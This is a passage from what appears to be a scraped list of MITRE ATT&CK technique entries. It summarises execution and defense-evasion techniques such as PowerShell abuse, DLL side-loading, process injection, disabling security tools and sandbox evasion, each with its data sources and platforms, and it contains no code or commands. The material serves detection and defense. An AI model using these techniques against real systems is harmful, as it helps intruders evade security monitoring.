Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre